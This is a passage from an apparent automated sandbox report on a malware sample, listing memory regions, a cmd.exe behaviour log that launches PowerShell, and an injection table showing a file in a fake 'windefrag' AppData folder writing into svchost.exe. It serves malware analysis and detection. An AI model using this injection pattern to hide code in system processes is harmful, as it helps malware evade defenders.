| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x97c
59
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:28:02 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 191850 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a090000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7624a84f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76253b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76234a5d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7624a79d |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x9c4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #21: svchost.exe
1307
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:51, Reason: Self Terminated |
| Monitor Duration | 00:00:31 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x980 |
| Parent PID | 0x668 (c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9A0
0x
524
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rwx |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00290000 | 0x002b8fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| tzres.dll | 0x002d0000 | 0x002d0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00770fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x01b7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b80000 | 0x01b80000 | 0x01f72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f80000 | 0x01f80000 | 0x021cffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x01f80000 | 0x01ffcfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0201ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002150000 | 0x02150000 | 0x021cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x021d0000 | 0x0249efff | Memory Mapped File | r |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fffd000 | 0x7fffd000 | 0x7fffdfff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0xffc20000 | 0xffc2afff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000140000000 | 0x140000000 | 0x140038fff | Private Memory | rwx |
|
|
|
- |
| webio.dll | 0x7fef7190000 | 0x7fef71f3fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7fef7200000 | 0x7fef7270fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefb670000 | 0x7fefb67afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7fefb680000 | 0x7fefb6a6fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7fefb8f0000 | 0x7fefba16fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7fefd5f0000 | 0x7fefd611fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7fefd620000 | 0x7fefd66dfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefdc30000 | 0x7fefdc3efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefddf0000 | 0x7fefdf56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7fefee30000 | 0x7fefee7cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7feffec0000 | 0x7feffec7fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x50000, size = 544 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x60000, size = 72 |
|
125 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0xffc2246c, size = 22 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x140000000, size = 1024 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x140001000, size = 166400 |
|
2 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a000, size = 35328 |
|
2 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x140033000, size = 3488 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x140033000, size = 1024 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x140034000, size = 8704 |
|
2 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x140037000, size = 2048 |
|
2 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x140038000, size = 1536 |
|
2 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 21 |
|
9 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20000, size = 16 |
|
118 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0xe0000, size = 48 |
|
124 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a2e8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 12 |
|
9 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a2f0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 6 |
|
5 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a2f8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 7 |
|
9 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a300, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 5 |
|
4 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a308, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 8 |
|
5 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a310, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 10 |
|
5 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a318, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 11 |
|
2 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a320, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 13 |
|
9 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a328, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a330, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 15 |
|
11 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a338, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 17 |
|
9 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a340, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 9 |
|
3 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a348, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a350, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a358, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 18 |
|
3 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a360, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a368, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a370, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a378, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a380, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a388, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a390, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 19 |
|
8 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a398, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 22 |
|
2 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3a0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3a8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3b0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3b8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3c0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3c8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3d0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3d8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3e0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3e8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3f0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a3f8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 14 |
|
2 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a400, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a408, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a410, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a418, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a420, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 25 |
|
4 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a078, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 24 |
|
2 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a080, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 20 |
|
5 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a088, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a090, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a098, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0a0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0a8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0b0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0b8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0c0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0c8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0d0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 23 |
|
5 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0d8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0e0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 28 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0e8, size = 8 |
|
1 | |
